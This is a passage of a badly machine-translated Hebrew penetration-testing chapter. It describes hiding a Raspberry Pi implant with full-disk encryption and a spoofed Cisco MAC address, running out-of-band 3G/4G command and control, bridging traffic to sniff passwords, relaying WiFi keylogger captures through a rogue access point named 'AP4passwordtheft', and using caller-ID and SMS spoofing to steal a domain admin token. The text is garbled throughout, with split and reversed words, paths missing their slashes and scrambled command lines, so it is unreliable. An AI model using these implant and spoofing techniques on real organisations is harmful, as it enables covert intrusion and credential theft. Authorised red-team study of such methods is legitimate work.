.‫את חו ל מ חד ש‬6.
:‫זה מו שג באופן ה בא‬Pi, ‫מ שורת הפ קודה‬
install openssh-server $ sudo update -rc.d -f ssh

lvm2 $ sudo apt-get install dcfldd $ sudo apt-get
apt-get install cryptsetup $ sudo apt-get install
get update $ sudo apt-get dist-upgrade $ sudo
update-rc.d -f ssh ‫ה סר‬$ sudo passwd $ sudo apt-
sudo etcinit.d/hostname.sh ‫ ברירת המ חד ל‬$ sudo
‫הת ח ל‬$ sudo echo systemsd > etchostname $
$ sudo reboot
:‫ ואז כ בה‬.‫ והו סף אותו לתצורה‬initramfs ‫ צור‬,‫לא חר מ כן‬

$ sudo mkinitramfs -o bootinitramfs.gz $ sudo nano bootconfig.txt
…
‫ ע כ שיו‬initramfs initramfs.gz followkernel $ sudo shutdown -hP
‫ההי כנ ס ב שם‬-USB, ‫ במתאם‬systemd ‫ עם כר טי ס‬bootsd SD ‫את ח ל את כר טי ס‬

‫ה‬-LAN: ‫ לתי בת הד ביאן דרך‬rsync ‫ וגי בוי דרך‬Pi,
rsync -aAXv --exclude= {"dev*","proc*","/sys/*","/tmp/*","run*","mnt*"," /media/*","/lost+found"}

$ sudo mount devsda2 mntusb $ sudo
backup/root/ $ sudo umount mntusb

mntusb/ user@192.168.1.3:homewil/
:‫ קצת ניהו ל ספריות במאר ח ד ביאן‬,‫לא חר מ כן‬

backup/root/home homeuser/backup/home $ mkdir homeuser/backup/root/home
$ mv homeuser/
‫ הגיע הזמן למ חו ק את מ חיצת ה שור ש הרא שונית ו להצפין‬,iP-‫ע כ שיו ב חזרה ל‬

LVM: ‫ו להגדיר את‬
sudo lvcreate -L 4G cvg -n root $ sudo lvcreate -l +100%FREE cvg -n home
devmapper/crypt $ sudo vgcreate lv/0 crypt $ sudo vgcreate lv/0 -n swap $
luksOpen devsda2 crypt $ sudo service lvm2 start $ sudo pvcreate
cryptsetup luksFormat --verify-passphrase devsda2 $ sudo cryptsetup
$ sudo dcfldd if=devurandom of=devsda2 $ sudo
:iP-‫הזן את בי טוי ה סי סמה ש ב חרת כא שר תת ב ק ש; ואז אתה מ ש חזר את הגי בוי ל‬
user@192.168.1.111:homeuser/backup/root/ mnroot/ $ sudo chown -R root:root mntroot

rsync -aAXv user@192.168.1.111:homeuser/backuphome mnthome/ $ sudo rsync -aAXv
$ sudo
:‫ה שתמ ש בננו )או מה שאתה מעדיף( כדי לערוך את ה ק בצים כפי שמוצג‬
root -‫ ל‬root=devmmcblk0p2 ‫ שנה את‬$ sudo nano /mntbootcmdline.txt
$ sudo nano mntrootetcfstab ‫הו סף‬root=devmapper/cvg-
cryptdevice=devmmcblk0p2:crypt
mntrootetccrypttab -‫ ל‬devmmcblk0p2 ‫שנה את‬

devmapper/crypt $ sudo nano
luks ‫אין‬crypt devmmcblk0p2
:‫ע כ שיו ה סר ה כ ל ות כ בה‬

$ sudo umount mntboot
$ sudo umount mntroot

$ sudo umount mnthome
$ sudo service lvm2 stop
‫ ע כ שיו‬$ sudo shutdown -hP
‫האת חו ל הרא שוןיי כ ש ל ותיפו ל לתוך‬SD systemd . ‫כעת את ח ל עם כר טי ס‬

‫ ש כן הם לא היו‬,‫י ש להפעי ל את אמצעי הא ח סון ה לוגיים באופןידני‬initramfs.
:‫הגדר אותם באופן ה בא‬fstab. -‫מות קן כ‬
(initramfs) cryptsetup luksOpen devmmcblk0p2 crypt

(initramfs) lvm
lvm> lvscan
‫לאשפעי ל‬ ‫ל‬ ‫י‬
‫פע‬ ‫ל לא‬swap'
‫'יור‬devcvg/ ‫[לא פעי‬500.00 MiB]
‫'יור ש‬devcvg/root' [4.00 GiB]
‫'יור ש‬devcvg/home' [2.85 GiB]
lvm> lvs
LV VG Attr %‫הע בריומן עות ק‬LSize Pool Origin Data%
‫להמיר‬
‫ גרם‬-wi----- 2.85 ‫ ביתי‬cvg
root cvg -wi----- 4.00g
swap cvg -wi----- 500.00m
lvm> vgchange -ay
‫" פעי לים כעת‬cvg" ‫נפ חים לוגיים ב ק בוצת נפ ח‬3
lvm> lvscan
ACTIVE ACTIVE ACTIVE
‫'יור ש‬devcvg/swap' [500.00 MiB] lvm> lvs
‫'יור ש‬devcvg/root' [4.00 GiB]
‫'יור ש‬devcvg/home' [2.85 GiB]
LV%‫ק‬
VG‫עות‬
Attr‫יומן‬
Convert home
‫הע בר‬LSize cvgOrigin
Pool -wi-a---Data%
2.85g
root cvg -wi-a--- 4.00g

swap cvg -wi-a--- 500.00m
‫צא‬lvm>
.‫יוצא‬
(initramfs) exit
‫ ו‬,‫ באופן ה בא‬fstab ‫ כ שנה את‬-root, ‫ הי כנ ס‬,‫ה סיים לאת ח ל מ חד ש‬-Pi ‫כא שר‬
initramfs: ‫ואז כתו ב מ חד ש‬
# nano etcfstab
‫פרו ק‬ /proc ‫פרו ק‬ ‫ברירות מ חד ל‬ 0
0
devmmcblk0p1 ‫מַ גָף‬/ vfat ‫ברירות מ חד ל‬ 0
0
devmapper/cvg-root / ext4 noatime 0 ,‫ברירות מ חד ל‬
1
‫‪devmapper/cvg-home /home‬‬ ‫‪ext4‬‬ ‫ברירות מ חד ל‬ ‫‪0‬‬

‫‪2‬‬
‫‪devmapper/cvg-swap‬אין‬ ‫לְ הַ ח לִיף‬ ‫‪sw‬‬ ‫‪0‬‬
‫‪0‬‬
‫‪# mkinitramfs -o bootinitramfs.gz‬‬
‫את חו ל א חד נו סף ואתה צריך לא שר ש כ ל אמצעי הא ח סון וה קו בץ ה לוגיים‬

‫הות קנו מער כות‪:‬‬
‫‪# lvm‬‬
‫‪lvm> lvs‬‬
‫‪LV VG Attr‬‬ ‫‪LSize Pool Origin Data%‬הע בריומן עות ק‪%‬‬
‫להמיר‬
‫‪ cvg‬ביתי ‪ -wi-ao-- 2.85‬גרם‬
‫‪root cvg -wi-ao-- 4.00g‬‬
‫‪swap cvg -wi-ao-- 500.00m‬‬
‫>‪lvm‬צא‬
‫‪# df -‬אה‬
‫‪2.5G‬ל ‪sysfs proc udev devpts tmpfs devmapper/cvg-root 3.9G‬‬
‫מות קן ע‬
‫ש‪1.2G%‬‬ ‫יםשימו‬
‫‪68%‬‬ ‫בצן‬
‫כתש קזמי‬
‫ימו‬‫גוד ל ב ש‬
‫מער‬
‫‪3.9G 2.5G rootfs‬‬
‫‪1.2G 68%‬‬
‫‪0 - 0sys‬‬
‫‪0‬‬
‫‪ 0 -‬פרו ק‬
‫‪0 10M 10M‬‬ ‫‪0‬‬
‫‪0% dev‬‬
‫‪0‬‬ ‫‪- devpts‬‬ ‫‪0‬‬
‫‪/ %193M 244K 93M‬ריצה‬
‫‪ 5.0‬מי ליון‬ ‫‪ tmpfs 0 5.0M 0%‬ריצה‪/‬נעי לה‬

‫‪ 186‬מי ליון‬ ‫‪tmpfs 0 186M 0% runshm‬‬
‫‪/ %63devmmcblk0p1 56M 20M 37M‬את חו ל‬
‫‪devmapper/cvg-home 2.8G 6.1M 2.6G 1% /home‬‬
‫‪#‬יציאה‬
‫הי כנ ס ‪ -Pi‬כ וודא ‪ -sudo‬ש עדיין עו בד;י ש ת ק לה ב‪setuid -‬‬

‫תה ליך ש לפעמיםי כו ל להרוג אותו‪ .‬אם זה לא עו בד‪ ,‬פ שו ט ה סר והת קן אותו מ חד ש‪.‬‬
‫‪# apt-get remove sudo‬‬
‫‪# apt-get install sudo‬‬
‫‪#‬את חו ל מ חד ש‬
‫כעת אתה ה בע לים הגאה ש ל הת קנת ‪ Raspbian‬עם קו בץ מוצפן ל ח לו טין‬

‫מער כת‪.‬‬
‫מי לה ע ל התגנ בות‬

‫ראוי לציין ש כא שר מ ח ברים מ כ שיר זר למ טרה‬
‫ר שת‪ ,‬היא ב סופו ש ל ד בר תימצא ‪-‬תוך כמה זמן ת לוי ב ק בועים כמו‬
‫ס בי בת המ טרה והגוד ל‪ ,‬אך גם גורמים ניתנים ל ש לי טה כגון מי קום‬
‫ס בי בת המ טרה והגוד ל‪ ,‬א ב ל גם גורמים ניתנים ל ש לי טה כמו התגנ בות מי קום‪ .‬גם אם‬
‫המ כ שיר מו סתר הי ט ב מ ב חינה פיזית או מו סתר לעין כ שהוא מת חזה למ שהו א חר‬
‫) לדוגמה‪ ,‬ממו קם בתי ק עם מד ב קות אזהרה ע ל ח ב לה(‪ ,‬הואיצ טרך ) ברו ב המ קרים(‬
‫כתו בת ‪ IP‬בר שת ו ל כן ע שוי להיות להתג לות ב סרי קת פגיעות שגרתית או גי לוי נ כ סים‪.‬‬
‫דרך ק לה ל קנות לעצמךיותר זמן היא ל שנות את כתו בת ה‪ CAM-‬ש ל ‪-Pi‬ה למ שהו‬
‫שמ שויך ל חומרה שונה כמו נת ב או מתג ‪ -‬מ שהו שאנ שים לאית חי לו ל ח ט ט בו ב לי‬
‫זהירות‪ .‬כדי לה שיג זאת‪ ,‬מצא את קו בץ ‪ config.txt‬במ ס לו ל ש ל כר טי ס ‪ )microSD‬לא‬
‫ה שור ש ש ל מער כת ההפע לה ‪Raspbian).‬זהייראה בערך כך‪:‬‬
‫‪#‬הגדר את מצ ב ‪ sdtv‬ל‪ ) LAP-‬כמו ב שימו ש באירופה( ‪sdtv_mode=2‬‬
‫‪ #‬כפה ע ל הצג למצ ב ‪ HDMI‬כך שה קו ליי ש ל ח‬

‫כ ב ל ‪HDMI hdmi_drive=2‬‬
‫‪#‬הגדר את מצ ב הצג ‪ -DMT hdmi_group=2‬ל‬
‫‪#‬הגדר את רזו לוציית הצג ל‪XGA 60 867x4201-‬הרץ ‪(HDMI_DMT_XGA_60) hdmi_mode=16‬‬
‫‪#‬ה ק טן את התצוגה כדי להפ סי ק לז לוג ט ק ס ט מהמ סך ‪overscan_right=12 overscan_top=10 overscan_bottom=10‬‬

‫‪overscan_left=20‬‬
‫הו סף את ה שורה ה באה כדי להגדיר את כתו בת ה‪ CAM-‬לפי ב חירתך‪ .‬במ קרה זה‪,‬‬
‫ש לו שת האו ק ט טים הרא שונים מציינים שהמ כ שיריוצר ע לידי ‪Cisco Systems Inc.:‬‬
‫‪smsc95xx.macaddr=00:11:21:3D:22:A5‬‬
‫שימו ל ב שאין צורך ל בצע שינויים נו ספים בתצורה בתוך ‪ Raspbian‬באמצעות‬

‫‪ ifconfig‬ו כו'‪.‬‬
‫אתהי כו ל ל ק חת את זה ר חו ק כ כ ל שתרצה‪ ,‬למ ש ל‪ ,‬ע לידי הגדרת דמון ‪Telnet‬‬
‫‪Cisco‬או ‪ SSH‬מזויף‪.‬‬
‫הגדרת פ קודה ו ש לי טה מ חוץ לפ ס באמצעות‬

‫‪3G/4G‬‬
‫סו כן ‪C2‬י כו ל לת ק שר עם ה שרת בא חת מ ש לו ש דר כים‪:‬‬
‫שימו ש בת שתית הר שת ש ל היעד עצמו ‪-‬זה לא מומ לץ‪ ,‬מ כיוון שיית כן ויציאה לא תהיה זמינה או‬
‫שתהיה מוג ב לת מאוד‪ .‬בנו סף‪ ,‬אתה חו שף מיותר את התנועה ש לך ל כ ל מדיניות א ב ט חה ו ט כנו לוגיות‬
‫ש קיימות‪.‬‬
‫יצירת ‪ AP‬באמצעות ה ש ב ב הא ל חו טי המו בנה ש ל ‪-Pi -‬ה שו ב‪ ,‬זה ע שוי לע בוד במהירות בנ סי בות‬
‫מוג ב לות מאוד‪ ,‬א ב ליהיה מת כון לת ס כו ל בהת ח ש ב ב טוו ח והעוצמה המוג ב לים ש ל המ כ שיר‪ .‬אתהי כו ל‬
‫להו סיף חומרה א ל חו טית חז קהיותר‪ ,‬א ב ל זהיהיה לרעת התגנ בות ) כמו ש בדרך כ ל ל מ שתמ שים‬
‫בנ קודת גי שה א ל חו טית(‪.‬‬
‫ה שתמ ש ב חי בור ‪ 3G/4G‬כדי לד בר ב חזרה ל שרת ‪C2 -‬זהו תר חי ש אידיא לי בהנ חה שהר שת‬
‫שאתה מת ח בר א ליה אינה מוגנת ע לידי כ לו ב ‪Faraday.‬זו הגי שה שאתאר כאן‪.‬‬
‫‪-Pi‬האינו תומך ב חי בורים ניידים באופן מ קורי‪ ,‬אך ניתן להו סיף ב ק לות דונג ל ‪ USB 3G/4G‬והוא נתמך ע ל‬
‫ידי מער כת ההפע לה ‪ Raspbian.‬בדוגמה ה באה‪ ,‬אני מ שתמ ש במ ק ל ‪ USB HSPA‬ש ל ‪Huawei‬המ חו בר‬
‫לר שת ‪Vodafone.‬‬
‫הדרך ה ק לה ביותר להדגים הגדרת חי בור ‪3G/4G‬היא באמצעות ס קריפ ט ‪sakis‬המופע ל במצ ב‬
‫אינ טרא ק טי בי‪.‬‬
‫הת קן ‪PPP:‬‬
‫‪sudo apt-get install ppp‬‬
‫הורד את ח בי לת ‪Sakis3g:‬‬
‫‪<br>sudo wget "http://www.sakis3g.com/downloads/sakis3g.tar.gz" -O sakis3g.tar.gz‬‬
‫פת ח את ה קו בץ‪:‬‬
‫‪sudo tar -xzvf sakis3g.tar.gz‬‬
‫הפוך את ה קו בץ לאפ שרי הפע לה‪:‬‬
‫‪sudo chmod +x sakis3g‬‬
‫הפע ל אותו במצ ב אינ טרא ק טי בי‪:‬‬
‫‪./sakis3g --‬אינ טרא ק טי בי‬
‫ה ש ל בים המוצגים באיורים ‪ 6-10‬עד ‪ 6-15‬ממ חי שים את התצורה ש ל מ כ שיר ‪-Huawei.‬ה‬

3G. ‫ הת ח בר עם‬:‫ ש ל ב רא שון‬6.10: ‫איור‬

USB. ‫ ב חר הת קן‬:‫ ש ל ב שני‬6.11: ‫איור‬
HUAWEI. ‫ נייד‬:‫ ש ל ב ש לי שי‬6.12: ‫איור‬

#0. ‫ ממ ש ק‬:‫ ש ל ב ר ביעי‬6.13: ‫איור‬

‫איור ‪ 6.14:‬ש ל ב חמי שי‪ :‬מנוי לע ס ק‪.‬‬
‫איור ‪ 6.15:‬ש ל ב שי שי‪ :‬אתה מו כן ל ל כת‪.‬‬

‫כעתי ש לנו גי שה לאינ טרנ ט באמצעות ‪3G:‬‬
‫‪ppp0‬‬ ‫קי שור ‪Point Protocol inet addr:109.32.107.215 PtP:10.64.64.64‬‬

‫‪ encap:Point-to-‬מ ס כה‪MULTICAST MTU:1500 552.552.552.552:‬‬
‫‪UP POINTOPOINT RUNNING NOARP‬‬
‫מדד‪1 :‬‬
‫)‪collisions:0 txqueuelen:3 RX bytes:582 (582.0 B) TX bytes:4792 (4.6 KiB‬‬
‫‪frame:0 TX packets:21 errors:0 droped:0 overruns:0 carrier:0‬‬
‫‪RX packets:12 errors:0 droped:0 overruns:0‬‬
‫יצירת ג שר ש קוף‬
‫חי בור ‪-Pi‬הי שירות למתג מאפ שר הת קפות נגד מער כות סמו כות ואו לי גי שה ר ח בהיותר‬
‫בהתאם לאר כי ט ק ט הר שת‪.‬‬
‫עם זאת‪ ,‬האפ שרויות לייר ט נתונים מוג ב לות‪ .‬או לי אם ניתן היה להתפ שר ע ל המתג‬
‫עצמו‪ ,‬ניתן היה ליצוריציאת ‪TAP,‬א ב ל כמות הנתונים שה‪iP-‬יצ טרך ל טפ ל בו הופ כת‬
‫את הגי שה הזו ל ב לתי מציאותית במ קרה ה טו ב‪ .‬דרך פו טנציא לית נו ספת לייר ט תע בורה‬
‫היא הרע לת מ טמון ‪ARP,‬א ב ל זה הר בהיותר מדי מגו שם ור שתות מודרניותי כו לות‬
‫לזהות ו ל ס כ ל אותה ב ק לות‪.‬‬
‫ר שתות מודרניותי כו לות לזהות ו ל ס כ ל אותו ב ק לות‪.‬‬

‫י ש דרך טו בהיותר‪.‬‬
‫אם מתוו סף מתאם אתרנ ט נו סף ל‪) iP-‬מתאם ‪USB‬הוא הדרך ה טו בה ביותר(‪ ,‬אתה‬
‫י כו ל להפוך את ‪-Pi‬ה לג שר ש קוף‪ ,‬אגנו ס טי ל ח לו טין ש ל פרו טו קו ל‪ ,‬שניתן לה כני ס לתוך‬
‫חי בור ר שת בין מתג ל‪ -‬מאר ח או מתג ונת ב ב כ ל תצורה שתרצו‪.‬‬
‫ש ל ב את זה עם ‪PoE‬וי ש לך ברז ר שת בהפע לה עצמית שתנת ב נתונים בין שתי נ קודות‬

‫ו) באמצעות כ לים שאתה מעדיף( תע בורתיומן‪ ,‬סי סמאות ו כו'‪ .‬זה לאיאפ שר ח שיפה‬
‫לתע בורה מוצפנת‪ ,‬א ב ל תתפ לאו לג לות כמה ד ברים מעניינים עו ברים בר שת ב ט ק ס ט‬
‫פ שו ט‪ .‬ב‪ ,ZMD-‬זהי כו ל ל שמ ש ל ל כידת מיי לים‪ ,‬למ ש ל‪.‬‬
‫הגדרת ‪-Pi‬ה לע שות זאת היא פ שו טהיותר ממה שאתה ע שוי ל ח שו ב‪ .‬רא שית הת קן‬
‫את כ לי הג שר‪:‬‬
‫‪ sudo apt-get‬להת קין ‪bridge-utils‬‬
‫לא חר מ כן שנה את קו בץ התצורה ו כו' ר שת‪/‬ממ ש קים כדי להו סיף את הד ברים‬
‫ה באים‪:‬‬
‫או טומ טי ‪eth0 eth1 bridge_stp on‬‬
‫‪iface br0 inet dhcp bridge_ports‬‬
‫‪br0‬‬
‫שימו ל ב שהדוגמה הזו מני חה שה‪ CIN-‬המו בנה ש ל כם הוא ‪ eth0‬ומתאם ‪-USB‬ההוא‬
‫‪eth1,‬א ב ל זה אמור להיות המ קרה‪ .‬ה ש ל ב הא חרון הוא להע לות את ממ ש ק הג שר‪:‬‬
‫‪sudo ifconfig up br0‬‬
‫אתה מו כן ל ל כת‪.‬‬
‫שימו ש ‪ -Pi‬ב כנ קודת גי שה א ל חו טית למתן גי שה ע לידי‬

‫‪ Keyloggers‬מרו ח קים‬
‫מ כ שירי ‪ Keylogger‬ש ל חומרה הם מ כ שירים המ חו ברים פיזית בין המאר ח למ ק לדת‬
‫)ראה איור ‪6.16).‬י שנםיתרונות ב שימו ש בגי שה זו ע ל פני תו כנת ‪keylogger.‬הם‬
‫ח סינים מפני אנ טי וירו ס וי ל כוד את כ ל מה שהמ שתמ ש מ ק ליד ל לא צורך בהר שאות‬
‫מיו חדות או גי שה לתה ליך‪ .‬ה ח סרונות הם הוצאות ‪-‬זמינים תו כנת ‪ keyloggers‬שי כו לים‬
‫להת ח בר ‪ -WiFi AP‬ל ו לד בר ה ביתה א ב ל הם עו לים כמה מאות דו לרים‪.‬‬
‫אתה גם חיי ב להיות נו כ ח פיזית כדי להת קין אותם‪ ,‬ו לא מר חו ק‬

‫א ספ קת מ טען תו כנה‪ .‬עם זאת‪ ,‬בהת ח ש ב ב כך ש ל‪iP-‬י ש א ל חו טי ע ל ה סיפון ואפ שר‬

‫להגדיר ערוץ ‪3G/4G C2,‬אםי ש לך גי שה פיזית לזמן קצר‪Pi ,‬י כו ל להיפר ס איפ שהו‬
‫בדי ס קר טיות ב בניין ו לא חר מ כן ל שמ ש כ ‪ -keyloggers‬ש ‪AP‬י כו לים להת ח בר א ליו‬
‫ו ל ש לו ח נתונים ה ביתה‪.‬‬
‫איור ‪-KeyGrabber‬ה ‪6.16:‬הוא דוגמה ‪ -keylogger‬ל בע לי כו לת ‪WiFi.‬‬

‫ניתן להפוך ‪ Raspberry Pi‬לנ קודת גי שה א ל חו טית די ס קר טית באמצעות ה ש ל בים‬
‫ה באים‪.‬‬
‫הת קן את התו כנה הנדר שת‪:‬‬
‫‪sudo apt-get‬הת קנת ‪hostapd isc-dhcp-server‬‬
‫ערוך את קו בץ התצורה ש ל שרת ‪-DHCP:‬ה‬

‫‪sudo nano etcdhcp/dhcpd.conf‬‬
‫כדי ל ש קף את הד ברים ה באים‪:‬‬
‫מ ו ּ סמָ ך; ר שת מ שנה ‪ 192.168.69.0‬מ סי כת ר שת ‪ }255.255.255.0‬טוו ח ;‪192.168.69.50‬‬

‫‪192.168.69.10‬אפ שרות שידור‪ -‬כתו בת ;‪192.168.69.255‬נת בי אופציה ;‪192.168.69.1‬‬
‫ברירת מ חד ל‪-‬זמן ח כירה ;‪ 600‬מ ק סימום‪-‬זמן ח כירה ;‪7200‬‬
‫}‬
‫לא חר מ כן שנה את תצורת ממ ש קי הר שת‪:‬‬

‫ממ ש קים‬/krowtenctesudo nano
:‫ ס ט טי‬IP ‫כדי לתת לו‬

‫ כתו בת ס ט טית‬iface wlan0 inet
255.255.255.0 ‫ מ סי כת ר שת‬192.168.69.1
AP: ‫הגדר את‬

sudo nano etchostapd/hostapd.conf
:‫כדי ל ש קף את הד ברים ה באים‬

wpa_key_mgmt=WPA-PSK wpa_pairwise=TKIP
wpa=2 wpa_passphrase=superscretpassword
macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0
ssid=AP4passwordtheft hw_mode=g channel=6
interface=wlan0
.‫ה ואת בי טוי ה סי סמה‬-SSID ‫או לי תרצה ל שנות את‬

‫ה‬-DHCP: ‫סיים את תצורת‬
sudo nano etcdefault/hostapd
:‫הו סף את ה שורה הזו‬
DAEMON_CONF="etchostapd/hostapd.conf"
(NAT): ‫הגדר תרגום כתו בות ר שת‬

sudo nano etcsysctl.conf
:‫הו סף את ה שורה ה באה‬

net.ipv4.ip_forward=1
:‫ עם הפ קודה ה באה‬IP ‫הפע ל הע ברת‬

sudo sh -c "echo 1 > procsys/net/ipv4/ip_forward"
‫תו ספת מהירה ש ל כמה כ ל לי ‪IPTables‬נ חוצה כדי לה ב טי ח שהתע בורה מנות בת‬
‫דרך ערוץ ‪3G/4G C2:‬‬
‫‪-o ppp0 -j MASQUERADE sudo iptables -A FORWARD -i ppp0 -o wlan0 -m state --state‬‬
‫‪sudo iptables -t nat -A POSTROUTING‬‬
‫‪RELATED,STABLISHED -j ACCEPT sudo iptables -A FORWARD -i wlan0 -o ppp0 -j ACCEPT‬‬
‫הפוך את ה כ ל לים הא לה לע ק ביים כדי ל שרוד את חו לים מ חד ש‪:‬‬
‫"‪sudo sh -c "iptables-save > etciptables.ipv4.nat‬‬
‫ערוך שו ב את קו בץ הממ ש קים‪:‬‬

‫‪/krowtenctesudo nano‬ממ ש קים‬
‫הו סף את ה שורה ה באה‪:‬‬

‫‪up iptables-restore < etciptables.ipv4.nat‬‬
‫הפע ל את ‪-AP‬ה עם הפ קודה ה באה‪:‬‬

‫‪sudo usrsbin/hostapd etchostapd/hostapd.conf‬‬
‫כ ל עוד ‪ 3G/4G C2‬ש לך מוגדר כה ל כה‪ ,‬ל קו חותי כו לים כעת להת ח בר ‪ -AP‬לזה‬
‫ו לג שת לאינ טרנ ט‪ .‬ליתר דיו ק‪ ,‬מ ק שים חומרהי כו לים להת ח בר ‪ -AP‬ל ו ל ספ ק ה ק שות‬
‫מ ק לדות מתועדות‪.‬‬
‫ההת קפה‬
‫מצג שווא ש ל עצמך הוא ה לי בה ש ל ‪ APT‬מוצ ל ח‪ ,‬בין אם הוא דגם או א חר‪ .‬הדרך‬
‫ה ק לה וה ב טו חה לע שות זאת היא ב ט לפון‪ .‬ט לפונים הם ט כנו לוגיה שאנ שים סומ כים‬
‫ע ליה ) לפ חותיותר מא שר בדוא" ל( כי הם מאמינים שהם ב לתי ניתנים ל טעות‪ .‬ניתן‬
‫להתפ שר ב ק לות ע ל ט כנו לוגיות ט לפון כגון זיהוי מת ק שר ו‪ SMS-‬כדי לגרום למ ק ל ט‬
‫להאמין שהוא מ ק ב ל שי חה או הודעת ט ק ס ט ממי שהתו קף רוצה‪ .‬כך ניתן להע לות‬
‫הוראות )או דרי שות( למ טרה בצורה מ ש כנעת‪ .‬ה ח שי בות ש ל ר כי שת ספריות ט לפוניה‬
‫ש ל ה ח ברה צרי כה להיות ברורה כעת‪ .‬ניתן ל ש ל ב הת קפה כזו עם דואר המוני כדי‬
‫ל ק בוע למי מוגדרת הודעת חופ שה "מ חוץ למ שרד" ב ח ש בון האימיי ל ש לו‪ .‬ל כן‪ ,‬כא שר‬
‫) לדוגמה( הודעת ‪ SMS‬מזויפת נ ש ל חת‪,‬י ש סי כוי מינימ לי שה בע לים האמיתי ש ל‬
‫המ ספר הזהיראה ת שו בות כ ל שהן שע לו לות להי ש ל ח באמצעות ‪SMS‬או דואר‬
‫א ל ק טרוני‪.‬‬
‫זיוף זיהוי מת ק שר והודעות ‪SMS‬‬

‫זיוף זיהוי מת ק שר והודעות ‪SMS‬‬

‫במ קרה זה‪ ,‬הצ ל חתי לה ח לי ק ספרייה פנימית מה ק ב לה‪ ,‬א ב ל זה לא תמיד נ חוץ ‪-‬צוות‬
‫ה ק ב לה לרו בי ספ ק לך מ ספרי ס לו לר לצוות אם כ ברי ש לך שמות לע בוד איתם‪ .‬זיוף‬
‫מ ספרי ה ט לפוןי כו ל להיע שות בדר כים שונות ‪-‬אם זה מ שהו שאתה הו לך לע שות‬
‫הר בה‪ ,‬אני מציע לך ל בנות מר כזיית כו כ בית מ ש לך‪ ,‬א ב ל זה ממ ש לא חו בה‪.‬י שנם ספ קי‬
‫‪ VoIP‬שונים המאפ שרים שי חותיוצאות בר ח בי העו לם תמורת תעריפים נמו כים ו ‪-‬‬
‫קרי טי ‪-‬אפ שרות להגדיר זיהוי מת ק שר ומ ספר ‪ SMS‬מ ש לך‪ .‬לא חר שהגדרת את‬
‫התו כנה ש לך ל שימו ש ב ספ ק ‪-VoIP,‬ההתצורה ש ל הא חרון מוצגת באיורים ‪ 6.17‬ו‬
‫‪-6.18.‬‬
‫איור ‪6.17:‬ניתן לזייף ב ק לות את זיהוי המת ק שר‪.‬‬
‫איור ‪6.18:‬זיוף הודעות ‪ SMS‬באופן דומה‪.‬‬

‫בהת ח ש ב במג ב לות זמן ו בנ סי בותיוצאות דופן שהיינו בהן וגם ב ש ל העו בדה שהייתה‬
‫לנו ) לפ חות תיאור טית( גי שה פיזית‪ ,‬ה ח ל טתי שאנ חנו צרי כים ניצ חון מהיר‪ .‬זהיהיה‬
‫כד ל קמן‪:‬‬
‫פרו ס מפת חות פיזיים במ טרה ל ק ב ל גי שה מנה לתית‪.‬‬
‫פרו ס ‪ Raspberry Pi‬כדי ל שמ ש כר כזת א ל חו טית להע ברת נתוני מפת ח לוגר‬
‫חזרה ל ב סי ס באמצעות חי בור נתונים ‪3G.‬‬
‫הו כ ח שאנ חנוי כו לים לגרום לפעו לה כ ל שהי להת בצע ע לידי היעד באמצעות‬
‫הודעות ‪ SMS‬מזויפות או זיהוי מת ק שר‪.‬‬
‫יעדים א לה‪ ,‬המ בוצעים בתוך מ סגרת זמן קצרה‪ ,‬בה ח ל טיפגינו פגיעות ויעני קו גי שה‬
‫נו ספת מ ספ קת אם ה ל קו חירצה לראות את הה שפעות ש ל תר חי ש ‪ APT‬ל טוו ח ארוך‬
‫יותר שי בוצע מנ קודת זינו ק זו‪ .‬לא חר מ כן ננ סה לג שת לנתונים ה סודיים המתוארים‬
‫בת חי לת פר ק זה‪.‬‬
‫‪-Raspberry Pi‬ה לא נז ק ק לגי שה לר שת כדי ל בצע את ע בודתו‪ ,‬א לא ר ק כו ח ומי קום‬

‫די ס קר טי‪ .‬ס טרתי תווית בצד למ קרה שמי שהוימצא אותה‪ ,‬כפי שמוצג באיור ‪6.19.‬‬
‫איור ‪ 6.19:‬שמור ע ל הד ברים הא לה פ שו טים אך ה שתמ ש ב כ ל הת בניות שי ש לך‬

‫בהי שגיד‪.‬‬
‫הת קנת מ ק לדות ה חומרה המוגדרות מרא ש היא פ שו טה כמו המתנה לארו חת הצהריים‬
‫ו חי בורם ב שורה בין המ ק לדת ומגד לי המ ח ש ב מת חת ל שו ל חן הע בודה; הם לאייג לו‬
‫לנצ ח‪ ,‬א ב ל אז הם לא צרי כים ‪ -‬ר ק מ ספי ק זמן כדי לתפו ס כמה אי שורי מנה ל או נתונים‬
‫ע סי סיים א חרים שי שודרו ב חזרה ל ב סי ס באמצעות פתרון ע שה זאת בעצמך ‪Raspberry‬‬
‫‪/iP‬נ קודת גי שה א ל חו טית‪3G/4G ./‬‬
‫כפי שהת ברר‪ ,‬הצ ל חנו לה שיג ח ש בונות לא ניהו ליים ר ק באמצעות מת קפת רי שום‬
‫המ ק שים‪ ,‬אז ה שתמ שנו בהת קפת זיהוי מת ק שר מזויפת ממ שתמ ש לגי טימי למנה ל כדי‬
‫ל ב ק ש מהם להי כנ ס לת חנת הע בודה ש ל אותו מ שתמ ש כדי ל בדו ק בעיה ו ואז גנ בו את‬
‫א סימון מנה ל הדומיין כ שע שו זאת‪.‬‬
‫ב ס בי בות ארגוניות ר בותי ש תמונת ט לפון ס טנדר טית המועת קת לנייד לפני הנפ קה‬
‫ל ח בר צוות‪ .‬תמונה זו מ כי לה לא ר ק את מדיניות הא ב ט חה א לא גם את ספר ה ט לפונים‬
‫העד כני ביותר‪ .‬היתרון ש ל זה מנ קודת המ ב ט ש לנו הוא שמ ספר מזויףיופיע כ שם‬
‫המ ק בי ל ב ספר ה ט לפונים‪ .‬שו ב‪ ,‬זה לא נותן למ טרה שום סי בה ל ח שוד‪.‬‬
‫זוהי א חת ההת קפות הפ שו טות אך ה חז קות ביותר באר סנ ל ש לך‪.‬‬

‫ב כ ל מ קרה‪ ,‬הת ברר ש כ ל ת חנת ע בודה ו שרת בר שת מנוה לים ע לידי ‪ )VNC‬ש לרו ב‬
‫נפר סת מאו ב ט חת עם סי סמה א חת ב כ ל הארגון(‪ .‬מ שמעות הד בר היא ש ברגע שת חנת‬
‫ע בודה בודדת נפגעה‪ ,‬ניתן היה ל ש חזר ב ק לות את ה סי סמה מהרי שום מ כיוון שהיא‬
‫מאו ח סנת ר ק ב קידוד הפ שו ט ביותר‪ .‬ב ש ל ב זה‪ ,‬עם ל קו ח ‪VNC,‬נו כ ל לג שת ל כ ל מער כת‬
‫בר שת‪ .‬ה בעיה הגדו לה ביותר שהייתה לנו הייתה העת קת כמויות גדו לות ש ל נתונים‬
‫ח סויים בזמן שנותר לנו‪.‬‬
‫סי כום‬
